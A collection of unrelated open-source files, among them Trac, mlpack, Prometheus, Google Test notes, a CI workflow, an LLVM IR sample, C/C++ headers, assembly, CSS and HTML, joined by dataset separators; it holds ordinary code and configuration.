node, raw_href, title = self._get_link_info(path, rev, formatter.href,
formatter.perm)
if not node:
return tag.a(label, class_='missing source')
link = tag.a(label, class_='source', href=src_href)
if raw_href:
link = tag(link, tag.a(u'\u200b', href=raw_href + fragment,
title=title,
class_='trac-rawlink' if node.isfile
else 'trac-ziplink'))
return link
PATH_LINK_RE = re.compile(r"([^@#:]*)" # path
r"[@:]([^#:]+)?" # rev
r"(?::(\d+(?:-\d+)?(?:,\d+(?:-\d+)?)*))?" # marks
)
def _get_link_info(self, path, rev, href, perm):
rm = RepositoryManager(self.env)
node = raw_href = title = None
try:
reponame, repos, npath = rm.get_repository_by_path(path)
node = get_allowed_node(repos, npath, rev, perm)
if node is not None:
raw_href = self._get_download_href(href, repos, node, rev)
title = _("Download") if node.isfile \
else _("Download as Zip archive")
except TracError:
pass
return node, raw_href, title
# IHTMLPreviewAnnotator methods
def get_annotation_type(self):
return 'blame', _('Rev'), _('Revision in which the line changed')
def get_annotation_data(self, context):
"""Cache the annotation data corresponding to each revision."""
return BlameAnnotator(self.env, context)
def annotate_row(self, context, row, lineno, line, blame_annotator):
blame_annotator.annotate(row, lineno)
# IWikiMacroProvider methods
def get_macros(self):
yield "RepositoryIndex"
def get_macro_description(self, name):
description = cleandoc_("""
Display the list of available repositories.
Can be given the following named arguments:
''format''::
Select the rendering format:
- ''compact'' produces a comma-separated list of repository prefix
names (default)
- ''list'' produces a description list of repository prefix names
- ''table'' produces a table view, similar to the one visible in
the ''Browse View'' page
''glob''::
Do a glob-style filtering on the repository names (defaults to '*')
''order''::
Order repositories by the given column (one of "name", "date" or
"author")
''desc''::
When set to 1, order by descending order
""")
return 'messages', description
def expand_macro(self, formatter, name, content):
args, kwargs = parse_args(content)
format = kwargs.get('format', 'compact')
glob = kwargs.get('glob', '*')
order = kwargs.get('order')
desc = as_bool(kwargs.get('desc', 0))
rm = RepositoryManager(self.env)
all_repos = dict(rdata for rdata in rm.get_all_repositories().items()
if fnmatchcase(rdata[0], glob))
if format == 'table':
repo = self._render_repository_index(formatter.context, all_repos,
order, desc)
add_stylesheet(formatter.req, 'common/css/browser.css')
wiki_format_messages = self.config['changeset'] \
.getbool('wiki_format_messages')
data = {'repo': repo, 'order': order, 'desc': 1 if desc else None,
'reponame': None, 'path': '/', 'stickyrev': None,
'wiki_format_messages': wiki_format_messages}
return Chrome(self.env).render_fragment(formatter.context.req,
'repository_index.html',
data)
def get_repository(reponame):
try:
return rm.get_repository(reponame)
except TracError:
return
all_repos = [(reponame, get_repository(reponame))
for reponame in all_repos]
all_repos = sorted(((reponame, repos) for reponame, repos in all_repos
if repos
and not as_bool(repos.params.get('hidden'))
and repos.is_viewable(formatter.perm)),
reverse=desc)
def repolink(reponame, repos):
label = reponame or _('(default)')
return Markup(tag.a(label,
title=_('View repository %(repo)s', repo=label),
href=formatter.href.browser(repos.reponame or None)))
if format == 'list':
return tag.dl([
tag(tag.dt(repolink(reponame, repos)),
tag.dd(repos.params.get('description')))
for reponame, repos in all_repos])
else: # compact
return Markup(', ').join(repolink(reponame, repos)
for reponame, repos in all_repos)
class BlameAnnotator(object):
def __init__(self, env, context):
self.env = env
self.context = context
rm = RepositoryManager(self.env)
self.repos = rm.get_repository(context.resource.parent.id)
self.path = context.resource.id
self.rev = context.resource.version
# maintain state
self.prev_chgset = None
self.chgset_data = {}
add_script(context.req, 'common/js/blame.js')
add_stylesheet(context.req, 'common/css/changeset.css')
add_stylesheet(context.req, 'common/css/diff.css')
self.reset()
def reset(self):
rev = self.rev
node = self.repos.get_node(self.path, rev)
# FIXME: get_annotations() should be in the Resource API
# -- get revision numbers for each line
self.annotations = node.get_annotations()
# -- from the annotations, retrieve changesets and
# determine the span of dates covered, for the color code.
# Note: changesets[i].rev can differ from annotations[i]
# (long form vs. compact, short rev form for the latter).
self.changesets = []
chgset = self.repos.get_changeset(rev)
chgsets = {rev: chgset}
self.timerange = TimeRange(chgset.date)
for idx in xrange(len(self.annotations)):
rev = self.annotations[idx]
chgset = chgsets.get(rev)
if not chgset:
chgset = self.repos.get_changeset(rev)
chgsets[rev] = chgset
self.timerange.insert(chgset.date)
# get list of changeset parallel to annotations
self.changesets.append(chgset)
# -- retrieve the original path of the source, for each rev
# (support for copy/renames)
self.paths = {}
for path, rev, chg in node.get_history():
self.paths[rev] = path
# -- get custom colorize function
browser = BrowserModule(self.env)
self.colorize_age = browser.get_custom_colorizer()
def annotate(self, row, lineno):
if lineno > len(self.annotations):
row.append(tag.th())
return
rev = self.annotations[lineno-1]
chgset = self.changesets[lineno-1]
path = self.paths.get(rev)
# Note: path will be None if copy/rename is not supported
# by get_history
# -- compute anchor and style once per revision
if rev not in self.chgset_data:
chgset_href = \
self.context.href.changeset(rev, self.repos.reponame or None,
path)
short_author = chgset.author.split(' ', 1)[0]
title = shorten_line('%s: %s' % (short_author, chgset.message))
anchor = tag.a('[%s]' % self.repos.short_rev(rev), # shortname
title=title, href=chgset_href)
color = self.colorize_age(self.timerange.relative(chgset.date))
style = 'background-color: rgb(%d, %d, %d);' % color
self.chgset_data[rev] = (anchor, style)
else:
anchor, style = self.chgset_data[rev]
if self.prev_chgset != chgset:
self.prev_style = style
# optimize away the path if there's no copy/rename info
if not path or path == self.path:
path = ''
# -- produce blame column, eventually with an anchor
style = self.prev_style
if lineno < len(self.changesets) and self.changesets[lineno] == chgset:
style += ' border-bottom: none;'
blame_col = tag.th(style=style, class_='blame r%s' % rev)
if self.prev_chgset != chgset:
blame_col.append(anchor)
self.prev_chgset = chgset
row.append(blame_col)
| {
"pile_set_name": "Github"
} |
// Unity C# reference source
// Copyright (c) Unity Technologies. For terms of use, see
// https://unity3d.com/legal/licenses/Unity_Reference_Only_License
using UnityEngine.UIElements;
namespace UnityEditor.UIElements
{
public class ToolbarPopupSearchField : ToolbarSearchField, IToolbarMenuElement
{
public new class UxmlFactory : UxmlFactory<ToolbarPopupSearchField> {}
public DropdownMenu menu { get; }
public ToolbarPopupSearchField()
{
AddToClassList(popupVariantUssClassName);
menu = new DropdownMenu();
searchButton.clickable.clicked += this.ShowMenu;
}
}
}
| {
"pile_set_name": "Github"
} |
/**
* @file methods/ann/visitor/backward_visitor.hpp
* @author Marcus Edel
*
* This file provides an abstraction for the Backward() function for different
* layers and automatically directs any parameter to the right layer type.
*
* mlpack is free software; you may redistribute it and/or modify it under the
* terms of the 3-clause BSD license. You should have received a copy of the
* 3-clause BSD license along with mlpack. If not, see
* http://www.opensource.org/licenses/BSD-3-Clause for more information.
*/
#ifndef MLPACK_METHODS_ANN_VISITOR_BACKWARD_VISITOR_HPP
#define MLPACK_METHODS_ANN_VISITOR_BACKWARD_VISITOR_HPP
#include <mlpack/methods/ann/layer/layer_traits.hpp>
#include <mlpack/methods/ann/layer/layer_types.hpp>
#include <boost/variant.hpp>
namespace mlpack {
namespace ann {
/**
* BackwardVisitor executes the Backward() function given the input, error and
* delta parameter.
*/
class BackwardVisitor : public boost::static_visitor<void>
{
public:
//! Execute the Backward() function given the input, error and delta
//! parameter.
BackwardVisitor(const arma::mat& input,
const arma::mat& error,
arma::mat& delta);
//! Execute the Backward() function for the layer with the specified index.
BackwardVisitor(const arma::mat& input,
const arma::mat& error,
arma::mat& delta,
const size_t index);
//! Execute the Backward() function.
template<typename LayerType>
void operator()(LayerType* layer) const;
void operator()(MoreTypes layer) const;
private:
//! The input parameter set.
const arma::mat& input;
//! The error parameter.
const arma::mat& error;
//! The delta parameter.
arma::mat& delta;
//! The index of the layer to run.
size_t index;
//! Indicates whether to use index or not
bool hasIndex;
//! Execute the Backward() function if the module does not have Run()
//! check.
template<typename T>
typename std::enable_if<
!HasRunCheck<T, bool&(T::*)(void)>::value, void>::type
LayerBackward(T* layer, arma::mat& input) const;
//! Execute the Backward() function if the module is has Run() function.
template<typename T>
typename std::enable_if<
HasRunCheck<T, bool&(T::*)(void)>::value, void>::type
LayerBackward(T* layer, arma::mat& input) const;
};
} // namespace ann
} // namespace mlpack
// Include implementation.
#include "backward_visitor_impl.hpp"
#endif
| {
"pile_set_name": "Github"
} |
// Copyright 2015 The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Package expfmt contains tools for reading and writing Prometheus metrics.
package expfmt
// Format specifies the HTTP content type of the different wire protocols.
type Format string
// Constants to assemble the Content-Type values for the different wire protocols.
const (
TextVersion = "0.0.4"
ProtoType = `application/vnd.google.protobuf`
ProtoProtocol = `io.prometheus.client.MetricFamily`
ProtoFmt = ProtoType + "; proto=" + ProtoProtocol + ";"
// The Content-Type values for the different wire protocols.
FmtUnknown Format = `<unknown>`
FmtText Format = `text/plain; version=` + TextVersion + `; charset=utf-8`
FmtProtoDelim Format = ProtoFmt + ` encoding=delimited`
FmtProtoText Format = ProtoFmt + ` encoding=text`
FmtProtoCompact Format = ProtoFmt + ` encoding=compact-text`
)
const (
hdrContentType = "Content-Type"
hdrAccept = "Accept"
)
| {
"pile_set_name": "Github"
} |
//
// LLResignView.h
// Olla
//
// Created by null on 14-11-4.
// Copyright (c) 2014年 xiaoran. All rights reserved.
//
#import <UIKit/UIKit.h>
// 通常用来回收键盘
@interface OllaResignView : UIView
@end
| {
"pile_set_name": "Github"
} |
Car -1 -1 -10 160 199 353 302 1.44 1.56 3.47 -6.09 1.97 12.80 1.64 1.00
Car -1 -1 -10 694 179 808 256 1.49 1.63 4.14 3.02 1.66 16.48 -1.61 1.00
Car -1 -1 -10 308 193 426 260 1.42 1.60 3.96 -6.06 2.00 18.35 1.59 1.00
Car -1 -1 -10 407 178 483 228 1.70 1.70 4.28 -6.03 1.91 26.78 1.61 1.00
Car -1 -1 -10 452 184 505 219 1.48 1.57 3.99 -6.04 2.04 33.44 1.61 0.98
Car -1 -1 -10 560 180 584 199 1.53 1.67 3.93 -3.12 2.18 60.35 1.61 0.86
Car -1 -1 -10 633 176 655 193 1.47 1.62 3.64 3.16 1.79 65.39 -1.41 0.50
Car -1 -1 -10 701 166 734 193 1.66 1.61 3.31 6.72 1.26 45.41 -1.57 0.40
Car -1 -1 -10 491 181 525 209 1.59 1.62 3.88 -6.28 2.17 44.68 1.55 0.30
Car -1 -1 -10 523 181 548 201 1.49 1.64 3.82 -6.04 2.25 58.92 1.58 0.27
Car -1 -1 -10 804 159 848 196 1.54 1.59 3.73 9.66 0.99 32.53 -1.37 0.03
| {
"pile_set_name": "Github"
} |
Changes for 1.3.0:
* New feature: death tests on Windows, Cygwin, and Mac.
* New feature: ability to use Google Test assertions in other testing
frameworks.
* New feature: ability to run disabled test via
--gtest_also_run_disabled_tests.
* New feature: the --help flag for printing the usage.
* New feature: access to Google Test flag values in user code.
* New feature: a script that packs Google Test into one .h and one
.cc file for easy deployment.
* New feature: support for distributing test functions to multiple
machines (requires support from the test runner).
* Bug fixes and implementation clean-up.
Changes for 1.2.1:
* Compatibility fixes for Linux IA-64 and IBM z/OS.
* Added support for using Boost and other TR1 implementations.
* Changes to the build scripts to support upcoming release of Google C++
Mocking Framework.
* Added Makefile to the distribution package.
* Improved build instructions in README.
Changes for 1.2.0:
* New feature: value-parameterized tests.
* New feature: the ASSERT/EXPECT_(NON)FATAL_FAILURE(_ON_ALL_THREADS)
macros.
* Changed the XML report format to match JUnit/Ant's.
* Added tests to the Xcode project.
* Added scons/SConscript for building with SCons.
* Added src/gtest-all.cc for building Google Test from a single file.
* Fixed compatibility with Solaris and z/OS.
* Enabled running Python tests on systems with python 2.3 installed,
e.g. Mac OS X 10.4.
* Bug fixes.
Changes for 1.1.0:
* New feature: type-parameterized tests.
* New feature: exception assertions.
* New feature: printing elapsed time of tests.
* Improved the robustness of death tests.
* Added an Xcode project and samples.
* Adjusted the output format on Windows to be understandable by Visual Studio.
* Minor bug fixes.
Changes for 1.0.1:
* Added project files for Visual Studio 7.1.
* Fixed issues with compiling on Mac OS X.
* Fixed issues with compiling on Cygwin.
Changes for 1.0.0:
* Initial Open Source release of Google Test
| {
"pile_set_name": "Github"
} |
name: Lint Ruby
on:
push:
branches:
- master
pull_request:
jobs:
rubocop:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: ruby/setup-ruby@v1
with:
ruby-version: 2.7
- name: Lint Ruby code with RuboCop
run: |
gem install bundler
bundle install --gemfile gemfiles/rubocop.gemfile --jobs 4 --retry 3
bundle exec --gemfile gemfiles/rubocop.gemfile rubocop
| {
"pile_set_name": "Github"
} |
; ModuleID = 'llvm_expressions/sample20-virt-anti-branch-analysis-branchFuns.ll'
source_filename = "llvm_expressions/sample20-virt-anti-branch-analysis-branchFuns.ll"
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"
; Function Attrs: norecurse nounwind readnone
define i64 @SECRET(i64 %SymVar_0) local_unnamed_addr #0 {
.3:
%.4 = and i64 %SymVar_0, 8722064
%.5 = or i64 %.4, 520257826
%.6 = and i64 %.5, %SymVar_0
%.13 = shl i64 %.6, 57
%.16 = lshr i64 %.6, 7
%.17 = or i64 %.13, %.16
%.20 = mul i64 %SymVar_0, 107672031
%.22 = add i64 %.17, %.20
%.24 = lshr i64 %.22, 56
%0 = lshr i64 %.22, 54
%.163 = and i64 %.24, %0
%.164 = shl nuw nsw i64 %.163, 4
%.167 = and i64 %.164, 208
%.196 = or i64 %.167, %.5
%.199 = lshr exact i64 %.6, 1
%.200 = and i64 %.199, 8
%.201 = or i64 %.200, 1
%.202 = sub nsw i64 64, %.201
%.208 = shl i64 %.196, %.202
%.219 = lshr i64 %.196, %.201
%.220 = or i64 %.208, %.219
%.265 = or i64 %0, %.24
%.266 = and i64 %.265, 14
%.267 = or i64 %.266, 1
%.268 = sub nsw i64 64, %.267
%.274 = lshr i64 %.220, %.268
%.351 = shl i64 %.220, %.267
%.352 = or i64 %.274, %.351
ret i64 %.352
}
attributes #0 = { norecurse nounwind readnone }
| {
"pile_set_name": "Github"
} |
{
"desc": "Sierra MC8765",
"control": 0,
"data": 2
}
| {
"pile_set_name": "Github"
} |
/*
* thd_engine.h: thermal engine class interface
*
* Copyright (C) 2012 Intel Corporation. All rights reserved.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License version
* 2 or later as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
* 02110-1301, USA.
*
*
* Author Name <[email protected]>
*
*/
#ifndef THD_ENGINE_H_
#define THD_ENGINE_H_
#include <pthread.h>
#include <poll.h>
#include <time.h>
#include "thd_common.h"
#include "thd_sys_fs.h"
#include "thd_preference.h"
#include "thd_sensor.h"
#include "thd_sensor_virtual.h"
#include "thd_zone.h"
#include "thd_cdev.h"
#include "thd_parse.h"
#include "thd_kobj_uevent.h"
#include "thd_rapl_power_meter.h"
#define MAX_MSG_SIZE 512
#define THD_NUM_OF_POLL_FDS 10
typedef enum {
WAKEUP,
TERMINATE,
PREF_CHANGED,
THERMAL_ZONE_NOTIFY,
RELOAD_ZONES,
POLL_ENABLE,
POLL_DISABLE,
FAST_POLL_ENABLE,
FAST_POLL_DISABLE,
} message_name_t;
// This defines whether the thermal control is entirey done by
// this daemon or it just complements, what is done in kernel
typedef enum {
COMPLEMENTRY, EXCLUSIVE,
} control_mode_t;
typedef struct {
message_name_t msg_id;
int msg_size;
unsigned long msg[MAX_MSG_SIZE];
} message_capsul_t;
typedef struct {
unsigned int family;
unsigned int model;
} supported_ids_t;
class cthd_engine {
protected:
std::vector<cthd_zone *> zones;
std::vector<cthd_sensor *> sensors;
std::vector<cthd_cdev *> cdevs;
int current_cdev_index;
int current_zone_index;
int current_sensor_index;
bool parse_thermal_zone_success;
bool parse_thermal_cdev_success;
std::string uuid;
bool parser_disabled;
private:
int poll_timeout_msec;
int wakeup_fd;
int uevent_fd;
control_mode_t control_mode;
int write_pipe_fd;
int preference;
bool status;
time_t thz_last_uevent_time;
time_t thz_last_temp_ind_time;
time_t thz_last_update_event_time;
bool terminate;
int genuine_intel;
int has_invariant_tsc;
int has_aperf;
bool proc_list_matched;
int poll_interval_sec;
cthd_preference thd_pref;
unsigned int poll_sensor_mask;
unsigned int fast_poll_sensor_mask;
int saved_poll_interval;
std::string config_file;
pthread_t thd_engine;
pthread_attr_t thd_attr;
pthread_mutex_t thd_engine_mutex;
std::vector<std::string> zone_preferences;
static const int thz_notify_debounce_interval = 3;
struct pollfd poll_fds[THD_NUM_OF_POLL_FDS];
int poll_fd_cnt;
bool rt_kernel;
cthd_kobj_uevent kobj_uevent;
bool parser_init_done;
int proc_message(message_capsul_t *msg);
void process_pref_change();
void thermal_zone_change(message_capsul_t *msg);
void process_terminate();
void check_for_rt_kernel();
public:
static const int max_thermal_zones = 10;
static const int max_cool_devs = 50;
static const int def_poll_interval = 4000;
static const int soft_cdev_start_index = 100;
cthd_parse parser;
cthd_rapl_power_meter rapl_power_meter;
cthd_engine(std::string _uuid);
virtual ~cthd_engine();
void set_control_mode(control_mode_t mode) {
control_mode = mode;
}
control_mode_t get_control_mode() {
return control_mode;
}
void thd_engine_thread();
virtual int thd_engine_start(bool ignore_cpuid_check);
int thd_engine_stop();
int check_cpu_id();
bool set_preference(const int pref);
void thd_engine_terminate();
void thd_engine_calibrate();
int thd_engine_set_user_max_temp(const char *zone_type,
const char *user_set_point);
int thd_engine_set_user_psv_temp(const char *zone_type,
const char *user_set_point);
void poll_enable_disable(bool status, message_capsul_t *msg);
void fast_poll_enable_disable(bool status, message_capsul_t *msg);
cthd_cdev *thd_get_cdev_at_index(int index);
void send_message(message_name_t msg_id, int size, unsigned char *msg);
void takeover_thermal_control();
void giveup_thermal_control();
void thd_engine_poll_enable(int sensor_id);
void thd_engine_poll_disable(int sensor_id);
void thd_engine_fast_poll_enable(int sensor_id);
void thd_engine_fast_poll_disable(int sensor_id);
void thd_read_default_thermal_sensors();
void thd_read_default_thermal_zones();
void thd_read_default_cooling_devices();
virtual void update_engine_state() {};
virtual int read_thermal_sensors() {
return 0;
}
;
virtual int read_thermal_zones() {
return 0;
}
;
virtual int read_cooling_devices() {
return 0;
}
;
int use_custom_zones() {
return parse_thermal_zone_success;
}
int use_custom_cdevs() {
return parse_thermal_cdev_success;
}
static const int max_cpu_count = 64;
time_t last_cpu_update[max_cpu_count];
virtual bool apply_cpu_operation(int cpu) {
return false;
}
int get_poll_timeout_ms() {
return poll_timeout_msec;
}
int get_poll_timeout_sec() {
return poll_timeout_msec / 1000;
}
void thd_engine_reload_zones();
bool processor_id_match() {
return proc_list_matched;
}
int get_poll_interval() {
return poll_interval_sec;
}
void set_poll_interval(int val) {
poll_interval_sec = val;
}
int get_preference() {
return preference;
}
void set_config_file(std::string conf_file) {
config_file = conf_file;
}
std::string get_config_file() {
return config_file;
}
virtual ppcc_t *get_ppcc_param(std::string name);
cthd_zone *search_zone(std::string name);
cthd_cdev *search_cdev(std::string name);
cthd_sensor *search_sensor(std::string name);
cthd_sensor *get_sensor(int index);
cthd_zone *get_zone(int index);
cthd_zone *get_zone(std::string type);
int get_sensor_temperature(int index, unsigned int *temperature);
unsigned int get_sensor_count() {
return sensors.size();
}
unsigned int get_zone_count() {
return zones.size();
}
unsigned int get_cdev_count() {
return cdevs.size();
}
void add_zone(cthd_zone *zone) {
zones.push_back(zone);
}
bool rt_kernel_status() {
return rt_kernel;
}
virtual void workarounds() {
}
// User/External messages
int user_add_sensor(std::string name, std::string path);
cthd_sensor *user_get_sensor(unsigned int index);
cthd_zone *user_get_zone(unsigned int index);
int user_add_virtual_sensor(std::string name, std::string dep_sensor,
double slope, double intercept);
int user_set_psv_temp(std::string name, unsigned int temp);
int user_set_max_temp(std::string name, unsigned int temp);
int user_add_zone(std::string zone_name, unsigned int trip_temp,
std::string sensor_name, std::string cdev_name);
int user_set_zone_status(std::string name, int status);
int user_get_zone_status(std::string name, int *status);
int user_delete_zone(std::string name);
int user_add_cdev(std::string cdev_name, std::string cdev_path,
int min_state, int max_state, int step);
cthd_cdev *user_get_cdev(unsigned int index);
int parser_init();
void parser_deinit();
};
#endif /* THD_ENGINE_H_ */
| {
"pile_set_name": "Github"
} |
;
; 2016-02-28, Groepaz
; 2017-06-15, Greg King
;
; unsigned char cpeekrevers (void);
;
.export _cpeekrevers
; Get a system-specific file.
; Note: The cbm610, and c128 targets need special
; versions that handle RAM banking and the 80-column VDC.
.if .def(__C16__)
.include "plus4.inc" ; both C16 and Plus4
.elseif .def(__C64__)
.include "c64.inc"
.elseif .def(__CBM510__)
.import CURS_X: zp, SCREEN_PTR: zp
.include "cbm510.inc"
.elseif .def(__PET__)
.include "pet.inc"
.elseif .def(__VIC20__)
.include "vic20.inc"
.endif
_cpeekrevers:
ldy CURS_X
lda (SCREEN_PTR),y ; get screen code
and #$80 ; get reverse bit
asl a
tax ; ldx #>$0000
rol a ; return boolean value
rts
| {
"pile_set_name": "Github"
} |
package org.mafagafogigante.dungeon.commands;
import org.mafagafogigante.dungeon.logging.DungeonLogger;
import org.jetbrains.annotations.NotNull;
import java.util.Locale;
/**
* Simple wrapper for a name and info of a Command.
*/
public class CommandDescription {
private final String name;
private final String info;
/**
* Creates a CommandDescription with the provided name and info.
*
* @param name a String for name, not null, lowercase
* @param info a String for info, nullable
*/
CommandDescription(@NotNull String name, String info) {
if (isNotLowercase(name)) {
DungeonLogger.warning("Passed a String that was not lowercase as name for a CommandDescription.");
name = name.toLowerCase(Locale.ENGLISH);
}
this.name = name;
this.info = info;
}
/**
* Checks if a String is not lowercase.
*
* @param string the String to be tested, not null
* @return true if the String is not lowercase, false if it is lowercase
*/
private static boolean isNotLowercase(String string) {
for (char c : string.toCharArray()) {
if (!Character.isLowerCase(c)) {
return true;
}
}
return false;
}
public String getName() {
return name;
}
public String getInfo() {
return info;
}
@Override
public String toString() {
return getName() + " : " + getInfo();
}
}
| {
"pile_set_name": "Github"
} |
cd C:\adt32\sdk\tools
tools emulator -avd avd_api_14 &
cd C:\android-neon\eclipse\workspace\AppCustomCameraDemo1
| {
"pile_set_name": "Github"
} |
<div class="submit-form">
<table class="submit-table">
<tr>
<td class="label">ID:</td>
<td>
<input name="id" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">访问用户:</td>
<td>
<input name="username" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">用户 IP:</td>
<td>
<input name="ipAddress" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">操作类型:</td>
<td>
<input name="operationType" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">操作说明:</td>
<td><input name="operation" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">请求耗时(毫秒):</td>
<td>
<input name="consumingTime" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">请求地址(url):</td>
<td><input name="requestUrl" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">请求方法:</td>
<td><input name="requestMethod" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">请求参数:</td>
<td><input name="requestParameter" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">请求语言:</td>
<td>
<input name="acceptLanguage" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">请求来源:</td>
<td><input name="referer" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">用户代理:</td>
<td><input name="userAgent" class="easyui-textbox" style="height:100px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">Handler:</td>
<td><input name="handler" class="easyui-textbox" style="height:100px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">异常堆栈:</td>
<td><input name="stackTrace" class="easyui-textbox" style="height:100px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">Session ID:</td>
<td><input name="sessionId" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">Cookie:</td>
<td><input name="cookie" class="easyui-textbox" style="height:100px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">响应状态码:</td>
<td>
<input name="status" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">创建时间:</td>
<td>
<input name="gmtCreated" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
</table>
</div>
| {
"pile_set_name": "Github"
} |
## Nudge
Nudge is service, designed to email token holders when their key purchase transactions have been successfully mined.
### How does it work?
The service fetches newly minted tokens from a GraphQL monitoring service.
Upon finding new tokens, the service will check to see if it has already been processed and if not if an email
address has been attached. In its current implementation, Nudge will look for the owner metadata associated with the key purchase. The values of the `protected.emailAddress` field (if applicable), will be used to send [an email confirming the key purchase](https://github.com/unlock-protocol/unlock/blob/master/wedlocks/src/templates/keyMined.js).
Under these conditions an email will be dispatched and upon successful dispatch will be recorded as so in order to avoid "duplicate" emails.
### Considerations
The service was designed to be fairly simple, reflecting the current usage of the ecosystem. If the demand increases,
the request for data processing should be queued with the requisite paralellization being provided via workers.
### Running the application
Nudge includes a Dockerfile, it is the easiest way to run the application. The following ENV variables need to be passed to the container:
* DB_USERNAME
* DB_PASSWORD
* DB_NAME
* DB_HOSTNAME
* WEB3_PROVIDER_HOST
* WEDLOCKS_URI
* GRAPHQL_BASE_URL
| {
"pile_set_name": "Github"
} |
/**
* phantomjs script for printing presentations to PDF.
*
* Example:
* phantomjs print-pdf.js "http://lab.hakim.se/reveal-js?print-pdf" reveal-demo.pdf
*
* By Manuel Bieh (https://github.com/manuelbieh)
*/
// html2pdf.js
var page = new WebPage();
var system = require( 'system' );
var slideWidth = system.args[3] ? system.args[3].split( 'x' )[0] : 960;
var slideHeight = system.args[3] ? system.args[3].split( 'x' )[1] : 700;
page.viewportSize = {
width: slideWidth,
height: slideHeight
};
// TODO
// Something is wrong with these config values. An input
// paper width of 1920px actually results in a 756px wide
// PDF.
page.paperSize = {
width: Math.round( slideWidth * 2 ),
height: Math.round( slideHeight * 2 ),
border: 0
};
var inputFile = system.args[1] || 'index.html?print-pdf';
var outputFile = system.args[2] || 'slides.pdf';
if( outputFile.match( /\.pdf$/gi ) === null ) {
outputFile += '.pdf';
}
console.log( 'Printing PDF (Paper size: '+ page.paperSize.width + 'x' + page.paperSize.height +')' );
page.open( inputFile, function( status ) {
window.setTimeout( function() {
console.log( 'Printed succesfully' );
page.render( outputFile );
phantom.exit();
}, 1000 );
} );
| {
"pile_set_name": "Github"
} |
*
{
-webkit-transition: all .25s ease-in-out;
-moz-transition: all .25s ease-in-out;
transition: all .25s ease-in-out ;
}
html, body
{
font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
font-size: 85%;
color: #4b5554;
text-shadow: 0 1px 0 rgba(255,255,255,.5);
}
.cover
{
width: 100%;
height: 368px;
margin: 0;
padding: 0;
background: url('../img/cover.png') no-repeat top center fixed;
background-color: #ffebee;
}
nav li
{
display: inline-block;
list-style: none;
}
.nav-main,
.nav-credits
{
float: right;
}
.nav-main li,
.nav-credits li
{
margin-left: 1.85em;
}
.spotlight
{
text-align: center;
}
a
{
text-decoration: none;
text-transform: uppercase;
color: #69706f;
}
a:hover
{
color: #000;
}
header
{
padding: 30px 0;
}
.spotlight h1
{
font-size: 2.5em;
font-weight: 100;
margin-bottom: 1em;
}
.spotlight h1 strong
{
display: inline;
font-weight: 500;
}
.spotlight h2
{
font-size: 1.25em;
font-weight: 300;
line-height: 1.5em;
margin-bottom: 5em;
}
.spotlight-image
{
margin: 8em 0 10em;
padding: 0;
}
.social li
{
float: left;
margin-right: 1em;
}
.logo
{
display: block;
padding: .5em 0;
}
.nav-main li a
{
display: block;
padding: .5em 1.5em;
border: 1.5px solid #15cab8;
border-radius: 60px;
}
.nav-main li a:hover
{
color: #111;
border: 1.5px solid #FF8A80;
}
/* Styles to help demonstrate the grid */
code,
pre
{
font-family: 'Source Code Pro', Consolas, Menlo, Monaco, monospace;
padding: 3px;
color: #333;
border-radius: 5px;
background: #E0F2F1;
}
pre
{
padding: 10px;
text-align: center;
}
.demo p
{
margin: 0;
}
.demo .column pre
{
margin: 0;
padding: 20px 0;
-webkit-transition: all .2s ease-in-out;
-moz-transition: all .2s ease-in-out;
transition: all .2s ease-in-out;
}
.demo .column pre:hover
{
background: #A7FFEB;
}
.grid,
.column
{
-webkit-transition: all .25s ease-in-out;
-moz-transition: all .25s ease-in-out;
transition: all .25s ease-in-out;
}
.demo .column .grid
{
overflow: hidden;
background: rgba(241,227,213,.5);
}
.demo .column .row:first-child
{
border-radius: 5px 5px 0 0;
}
.demo .column .row:last-child
{
border-radius: 0 0 5px 5px;
}
p code{
display: inline-block;
margin-top: 5px;
}
| {
"pile_set_name": "Github"
} |
#
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.
#
# Copyright (c) 2011-2013 Oracle and/or its affiliates. All rights reserved.
#
# The contents of this file are subject to the terms of either the GNU
# General Public License Version 2 only ("GPL") or the Common Development
